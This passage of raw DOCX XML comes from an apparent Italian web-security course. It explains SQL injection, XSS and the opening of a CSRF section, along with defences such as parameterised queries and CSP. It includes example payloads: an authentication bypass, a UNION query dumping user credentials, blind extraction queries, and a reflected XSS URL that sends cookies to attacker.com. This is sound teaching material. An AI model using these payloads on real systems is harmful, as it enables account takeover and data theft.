        <w:t xml:space="preserve">Il database: se le query non sono parametrizzate, un attaccante puo' manipolare le query SQL attraverso l'input (SQL Injection). Il database contiene spesso i dati piu' preziosi: credenziali, dati personali, informazioni finanziarie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Il rendering nel browser: se l'output non e' sanitizzato, un attaccante puo' iniettare codice JavaScript che verra' eseguito nel browser della vittima (XSS). Questo puo' portare al furto di cookie di sessione, keylogging, defacement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le sessioni e i cookie: se i token di sessione sono prevedibili o i cookie non hanno flag di sicurezza adeguati, un attaccante puo' hijackare la sessione di un altro utente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Il concetto chiave e' il Trust Boundary (confine di fiducia): ogni punto in cui dati passano da un contesto non fidato a uno fidato deve avere controlli di validazione. L'input dell'utente e' SEMPRE non fidato, anche se proviene da campi nascosti, cookie o header HTTP. L'unico modo sicuro di gestire l'input e' validarlo e sanitizzarlo lato server, mai fidarsi del client.</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4: SQL INJECTION - TEORIA APPROFONDITA</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cos'e' SQL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL (Structured Query Language) e' il linguaggio standard per gestire database relazionali. Un database relazionale organizza i dati in tabelle composte da righe (record) e colonne (campi). Le operazioni principali sono: SELECT (leggere dati), INSERT (inserire dati), UPDATE (modificare dati), DELETE (cancellare dati).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Una query SQL tipica: SELECT * FROM users WHERE username = 'admin' AND password = 'secret123'. Questa query cerca nella tabella 'users' una riga dove il campo username e' 'admin' e il campo password e' 'secret123'. Se trova una corrispondenza, restituisce tutti i campi (*) di quella riga.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Come un'Applicazione Web Interagisce con il Database</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Il flusso tipico e': 1) L'utente compila un form (es. login) e clicca Invio. 2) Il browser invia una richiesta HTTP al server con i dati (username e password). 3) Il server riceve i dati e deve costruire una query SQL per verificare le credenziali. 4) Il server invia la query al database. 5) Il database esegue la query e restituisce i risultati. 6) Il server elabora i risultati e invia la risposta al browser.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Il problema sorge al punto 3: COME il server costruisce la query. Se il server concatena direttamente l'input dell'utente nella stringa SQL, un attaccante puo' manipolare la query inserendo codice SQL nel campo di input.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Il Problema: Concatenazione di Stringhe nelle Query</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Codice vulnerabile (pseudocodice): query = "SELECT * FROM users WHERE username = '" + username + "' AND password = '" + password + "'". Se l'utente inserisce come username: admin' -- il server costruira': SELECT * FROM users WHERE username = 'admin' --' AND password = 'qualsiasi'. I due trattini (--) sono un commento SQL: tutto cio' che segue viene ignorato. La query diventa equivalente a: SELECT * FROM users WHERE username = 'admin'. La password non viene piu' verificata. L'attaccante ottiene accesso come admin senza conoscere la password.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tipi di SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Classic (In-band) SQL Injection: l'attaccante inserisce codice SQL in un campo di input e i risultati sono visibili direttamente nella risposta della pagina. E' il tipo piu' semplice e diretto. L'esempio sopra del bypass dell'autenticazione e' un'injection classica.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION-based SQL Injection: l'attaccante usa l'operatore SQL UNION per aggiungere una seconda query SELECT alla query originale. UNION combina i risultati di due SELECT in un unico set di risultati, a patto che abbiano lo stesso numero di colonne. Esempio: se una pagina di ricerca prodotti esegue SELECT * FROM products WHERE name LIKE '%input%', l'attaccante puo' inserire: ' UNION SELECT id, username, password, role FROM users --. La pagina mostrera' sia i prodotti sia i dati degli utenti.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Blind SQL Injection (Boolean-based): l'attaccante non vede direttamente i risultati della query, ma puo' inferire informazioni dalla risposta del server. Invia query che producono risultati vero/falso e osserva come cambia la risposta. Esempio: 1 AND 1=1 (la pagina risponde normalmente) vs 1 AND 1=2 (la pagina cambia comportamento). L'attaccante puo' poi estrarre dati un carattere alla volta: 1 AND (SELECT SUBSTR(username,1,1) FROM users WHERE role='admin')='a'. Se la pagina risponde 'vero', il primo carattere dello username dell'admin e' 'a'. Ripetendo per ogni posizione e carattere, si estrae l'intero valore. E' lento ma efficace.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Blind SQL Injection (Time-based): simile al boolean-based, ma usa ritardi temporali invece di risposte diverse. L'attaccante inserisce comandi che causano un ritardo nel server se la condizione e' vera. Esempio: 1 AND IF(SUBSTR(username,1,1)='a', SLEEP(5), 0). Se la risposta impiega 5 secondi, il primo carattere e' 'a'. Se risponde subito, non lo e'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Second-order SQL Injection: il payload SQL viene prima memorizzato nel database (es. in un campo del profilo utente) e poi eseguito in un secondo momento quando un'altra funzione lo legge e lo usa in una query senza sanitizzazione. E' piu' difficile da rilevare perche' l'injection non avviene al momento dell'inserimento.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Impatto della SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La SQL Injection puo' permettere all'attaccante di: leggere dati sensibili dal database (credenziali, dati personali, informazioni finanziarie), modificare o cancellare dati (UPDATE, DELETE, DROP TABLE), bypassare l'autenticazione (accesso senza password), eseguire comandi sul sistema operativo del server in alcuni casi (RCE - Remote Code Execution, tramite funzioni come xp_cmdshell in SQL Server), leggere o scrivere file sul server (LOAD_FILE, INTO OUTFILE in MySQL).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">E' considerata una delle vulnerabilita' piu' pericolose perche' puo' compromettere completamente un sistema, dall'accesso non autorizzato fino al controllo totale del server.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Difesa: Prepared Statements (Query Parametrizzate)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La difesa principale contro SQL Injection sono i prepared statements (query parametrizzate). Invece di concatenare l'input nella query, si usa un template con segnaposto. Il database tratta l'input sempre come dati, mai come codice SQL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Codice protetto (pseudocodice): query = 'SELECT * FROM users WHERE username = ? AND password = ?'; db.execute(query, [username, password]). Anche se l'utente inserisce admin' --, il database cerchera' letteralmente un utente con username uguale alla stringa "admin' --", che ovviamente non esiste. L'input non viene mai interpretato come codice SQL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Altre difese complementari: input validation (validare tipo, lunghezza e formato dell'input), least privilege (l'utente del database usato dall'applicazione dovrebbe avere solo i permessi strettamente necessari), WAF (Web Application Firewall) che filtra richieste sospette, stored procedures parametrizzate, ORM (Object-Relational Mapping) che generano query sicure automaticamente.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tipi di Code Injection oltre SQL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La SQL Injection e' il caso piu' noto, ma il concetto di code injection si applica a molti contesti: OS Command Injection (iniettare comandi nel sistema operativo), LDAP Injection (manipolare query LDAP per directory services), XPath Injection (manipolare query XML), Template Injection (iniettare codice nei template engine come Jinja2, Twig), NoSQL Injection (manipolare query in database NoSQL come MongoDB).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Il principio di base e' sempre lo stesso: mai fidarsi dell'input dell'utente e mai concatenarlo direttamente in comandi o query. Usare sempre meccanismi di parametrizzazione o escaping appropriati per il contesto specifico.</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5: CROSS-SITE SCRIPTING (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cos'e' il Cross-Site Scripting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Il Cross-Site Scripting (XSS) e' una vulnerabilita' che permette a un attaccante di iniettare codice JavaScript malevolo in pagine web visualizzate da altri utenti. A differenza della SQL Injection che attacca il server/database, XSS attacca direttamente il browser dell'utente vittima. Il nome 'Cross-Site' si riferisce al fatto che lo script malevolo viene eseguito nel contesto di un sito fidato dalla vittima.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS sfrutta la fiducia che il browser ha verso il sito: il codice JavaScript iniettato viene eseguito con gli stessi privilegi degli script legittimi della pagina, avendo accesso a cookie, sessione, DOM e tutto cio' che il sito puo' fare.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tipi di XSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Reflected XSS: il payload malevolo e' contenuto nella richiesta HTTP (tipicamente in un parametro URL) e viene 'riflesso' nella risposta della pagina senza sanitizzazione. Non viene salvato sul server. L'attaccante deve convincere la vittima a cliccare su un link appositamente costruito. Esempio: un sito di ricerca che mostra 'Hai cercato: [input]' senza escaping. Se l'input e' &lt;script&gt;codice malevolo&lt;/script&gt;, il browser lo esegue come JavaScript. L'attaccante crea un URL tipo: sito.com/search?q=&lt;script&gt;document.location='http://attacker.com/steal?cookie='+document.cookie&lt;/script&gt; e lo invia alla vittima.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Stored XSS: il payload malevolo viene salvato nel database del server (es. in un commento, un post, un profilo utente) e viene eseguito ogni volta che un utente carica quella pagina. E' piu' pericoloso del reflected perche' non richiede che la vittima clicchi un link specifico: basta visitare la pagina. Esempio: un attaccante posta un commento contenente codice JavaScript. Ogni utente che visualizza i commenti eseguira' involontariamente quello script. Lo script puo' rubare cookie di sessione, modificare il contenuto della pagina, o reindirizzare a siti malevoli.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">DOM-based XSS: il payload non passa mai attraverso il server. Lo script malevolo viene eseguito interamente nel browser manipolando il DOM (Document Object Model) della pagina. Si verifica quando il JavaScript lato client usa dati controllabili dall'utente (come location.hash, document.referrer, window.name) per modificare il DOM senza sanitizzazione. E' piu' difficile da rilevare perche' il server non vede mai il payload.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Same-Origin Policy e Come XSS la Aggira</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La Same-Origin Policy (SOP) e' un meccanismo di sicurezza fondamentale del browser che impedisce agli script di un'origine (dominio + protocollo + porta) di accedere ai dati di un'altra origine. Ad esempio, uno script su evil.com non puo' leggere i cookie di bank.com. Questo protegge gli utenti impedendo a siti malevoli di rubare dati da altri siti aperti nello stesso browser.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS aggira la Same-Origin Policy perche' lo script malevolo viene eseguito nel contesto del sito vittima. Per il browser, e' come se fosse codice legittimo di quel sito. Quindi ha pieno accesso ai cookie, alla sessione, al DOM e a tutte le API disponibili per quel dominio. E' per questo che XSS e' cosi' pericoloso: trasforma il sito fidato in un veicolo di attacco.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Impatto di XSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un attacco XSS puo' permettere di: rubare cookie di sessione (session hijacking - l'attaccante accede all'account della vittima), registrare tutti i tasti premuti (keylogging - catturando password e dati sensibili), modificare il contenuto della pagina (defacement o phishing - mostrando un form di login falso), reindirizzare l'utente a siti malevoli, eseguire azioni per conto dell'utente (come cambiare email o password), diffondere worm XSS (script che si auto-replicano attraverso profili utente).</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Difese contro XSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Output encoding (escaping): convertire i caratteri speciali HTML in entity. Ad esempio: &lt; diventa &amp;lt;, &gt; diventa &amp;gt;, " diventa &amp;quot;, ' diventa &amp;#x27;, &amp; diventa &amp;amp;. In questo modo, &lt;script&gt; diventa &amp;lt;script&amp;gt; e il browser lo mostra come testo invece di eseguirlo come codice. L'encoding deve essere applicato nel contesto giusto: HTML, JavaScript, URL, CSS hanno regole di encoding diverse.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Content Security Policy (CSP): header HTTP che specifica al browser da dove puo' caricare risorse (script, stili, immagini). Esempio: Content-Security-Policy: script-src 'self' impedisce l'esecuzione di script inline e da domini esterni. Anche se un attaccante riesce a iniettare un tag &lt;script&gt;, il browser lo blocchera' se viola la CSP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Input validation: validare e sanitizzare l'input prima di memorizzarlo. Usare whitelist di caratteri ammessi quando possibile. Per contenuto ricco (come editor HTML), usare librerie di sanitizzazione come DOMPurify che rimuovono tag e attributi pericolosi mantenendo la formattazione sicura.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Flag HttpOnly sui cookie: impedisce a JavaScript di accedere ai cookie. Anche se un attaccante riesce a eseguire XSS, non puo' rubare il cookie di sessione con document.cookie. Il cookie viene comunque inviato nelle richieste HTTP, ma non e' leggibile dagli script.</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6: CROSS-SITE REQUEST FORGERY (CSRF)</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cos'e' il CSRF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Il Cross-Site Request Forgery (CSRF, pronunciato 'sea-surf') e' un attacco che forza un utente autenticato a eseguire azioni indesiderate su un'applicazione web in cui e' attualmente autenticato. A differenza di XSS che sfrutta la fiducia dell'utente verso un sito, CSRF sfrutta la fiducia che il sito ha verso il browser dell'utente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Il meccanismo e' semplice: quando sei loggato su un sito, il browser invia automaticamente i cookie di sessione con ogni richiesta a quel sito. Un sito malevolo puo' creare una richiesta (tramite form nascosto, tag img, o JavaScript) che punta al sito in cui sei loggato. Il browser allega automaticamente i tuoi cookie, e il server esegue l'azione credendo che sia una tua richiesta legittima.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP e' Stateless: il Nesso con CSRF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
